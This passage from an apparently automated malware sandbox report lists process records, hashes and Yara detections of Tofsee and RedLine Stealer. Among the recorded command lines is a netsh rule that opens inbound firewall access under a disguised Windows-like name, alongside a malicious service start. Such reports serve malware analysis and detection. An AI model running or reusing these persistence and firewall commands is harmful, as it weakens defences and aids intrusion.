Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff64e5e0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:21
Start date:14/01/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\sc.exe" start ffiawxs
Imagebase:0xa0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:21
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:22
Start date:14/01/2022
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase:0x11f0000
File size:82944 bytes
MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:22
Start date:14/01/2022
Path:C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe"
Imagebase:0x400000
File size:13666304 bytes
MD5 hash:5C50CF4AF77D12BF94B3FC09437C8B16
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000003.388526176.00000000007F0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000002.391463142.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000002.391805380.0000000000680000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000002.391938773.0000000000840000.00000004.00000001.sdmp, Author: Joe Security

General

Start time:21:05:22
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:21:05:26
Start date:14/01/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0xb90000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002C.00000002.524985253.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:21:05:29
Start date:14/01/2022
Path:C:\Users\user\AppData\Local\Temp\3BC6.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\3BC6.exe
Imagebase:0x3c0000
File size:537088 bytes
MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.407524125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.408441992.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000002.429951321.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.408078077.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:21:05:32
Start date:14/01/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff797770000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Disassembly

Code Analysis
